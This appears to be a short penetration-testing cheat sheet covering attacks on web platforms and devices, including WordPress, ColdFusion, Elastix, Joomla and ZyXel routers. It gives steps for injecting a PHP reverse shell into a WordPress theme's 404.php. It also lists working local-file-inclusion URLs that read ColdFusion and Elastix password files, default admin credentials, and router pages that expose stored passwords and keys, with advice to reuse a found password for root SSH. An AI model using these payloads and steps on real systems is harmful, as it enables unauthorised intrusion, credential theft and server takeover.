1 minute read

  • Enumerate version and few other details
  • Google their vulnerability

Wordpress

admin page

/wp-admin
/wp-login

Configuration files

setup-config.php
wp-config.php

Enumerate users

/?author=1, /?author=2,

Uploading shell in WP_THEME

  1. Login into WP_dashboard and explore the appearance tab.
  2. Now go in Themes section under Appearance and select Editor and there select twenty fifteen templet and get into 404.php
  3. You see a text area for editing templet, inject your malicious php code here to obtain reverse connection of the webserver.
  4. Update the file and go to following url - /wordpress/wp-content/themes/twentyfifteen/404.php
  5. you will have your session upon execution of 404.php file. :)

Drupal

Droopescan

droopescan scan drupal -u http://example.org/ -t 32

Find version

/CHANGELOG.txt

Adobe Cold Fusion

Determine version

/CFIDE/adminapi/base.cfc?wsdl

Version 8 Vulnerability

  • fckeditor
  • LFI
  • http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Elastix

  • Google the vulnerabitlities
  • default login are admin:admin at /vtigercrm/
  • able to upload shell in profile-photo

2.2.0 - 'graph.php' Local File Inclusion

http://server/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

  • Note: Most probably this will be same password for root user too , so you can directly ssh through it

Joomla

  • Admin page - /administrator
  • Configuration files 
    configuration.php
diagnostics.php
joomla.inc.php
config.inc.php

Mambo

Config files

configuration.php
config.inc.php

ZyXel

Configuration files

/WAN.html (contains PPPoE ISP password) 
/WLAN_General.html and /WLAN.html (contains WEP key) 
/rpDyDNS.html (contains DDNS credentials) 
/Firewall_DefPolicy.html (Firewall) 
/CF_Keyword.html (Content Filter) 
/RemMagWWW.html (Remote MGMT) 
/rpSysAdmin.html (System) 
/LAN_IP.html (LAN) 
/NAT_General.html (NAT) 
/ViewLog.html (Logs) 
/rpFWUpload.html (Tools) 
/DiagGeneral.html (Diagnostic) 
/RemMagSNMP.html (SNMP Passwords) 
/LAN_ClientList.html (Current DHCP Leases) 

# Config Backups
/RestoreCfg.html
/BackupCfg.html

You May Also Enjoy

Linux

less than 1 minute read